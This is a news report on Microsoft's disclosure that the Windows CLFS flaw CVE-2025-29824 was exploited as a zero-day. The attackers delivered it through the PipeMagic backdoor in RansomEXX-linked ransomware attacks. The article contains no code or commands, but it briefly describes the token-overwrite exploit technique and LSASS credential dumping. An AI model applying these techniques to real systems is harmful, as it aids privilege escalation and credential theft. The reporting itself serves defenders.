Microsoft has announced that a recently patched security vulnerability affecting the Windows Common Log File System (CLFS) was actively exploited as a zero-day in ransomware attacks targeting a select group of organizations. These targets primarily include entities within the information technology (IT) and real estate sectors of the United States, alongside the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia.
The vulnerability, identified as CVE-2025-29824, is a privilege escalation bug within the CLFS that can be exploited to attain SYSTEM privileges. Microsoft effectively resolved this issue in its April 2025 Patch Tuesday update. The company is monitoring the exploitation activities related to CVE-2025-29824 under the codename Storm-2460. The threat actors involved have also utilized a malware known as PipeMagic to deliver the exploit along with ransomware payloads.
While the precise initial access vector employed in these attacks remains unknown, threat actors have been observed using the certutil utility to download malware from a compromised legitimate third-party site. This malware includes a malicious MSBuild file containing an encrypted payload, which is subsequently unpacked to deploy PipeMagic, a plugin-based trojan that has been circulating in the wild since 2022.
Notably, CVE-2025-29824 marks the second Windows zero-day flaw delivered via PipeMagic, following CVE-2025-24983, a privilege escalation vulnerability in the Windows Win32 Kernel Subsystem. This was flagged by ESET and patched by Microsoft just last month. Moreover, PipeMagic was previously linked to Nokoyawa ransomware attacks that exploited another CLFS zero-day vulnerability, CVE-2023-28252.
In prior attacks attributed to the same group, it was noted that before exploiting the CLFS elevation-of-privilege vulnerability, victims’ machines were compromised by a custom modular backdoor referred to as PipeMagic, which was initiated through an MSBuild script, as highlighted by Kaspersky in April 2023.
It is essential to mention that Windows 11, version 24H2 is not affected by this specific vulnerability. This is because access to certain System Information Classes within NtQuerySystemInformation is restricted to users with SeDebugPrivilege, typically reserved for administrative users. The exploit targets a vulnerability in the CLFS kernel driver, which the Microsoft Threat Intelligence team elaborated on.
The exploit mechanism utilizes a memory corruption technique along with the RtlSetAllBits API to overwrite the exploit process's token with the value 0xFFFFFFFF. This action grants all privileges to the process, facilitating process injection into SYSTEM processes. Following successful exploitation, the threat actors can extract user credentials by dumping the memory of LSASS and encrypting files on the system with a random extension.
Although Microsoft could not procure a sample of the ransomware for analysis, the company reported that the ransom note left after file encryption included a TOR domain linked to the RansomEXX ransomware family. Ransomware threat actors prioritize post-compromise elevation of privilege exploits because they allow for the escalation of initial access, transforming handoffs from commodity malware distributors into privileged access. This privileged access is then leveraged for extensive deployment and execution of ransomware within a target environment.
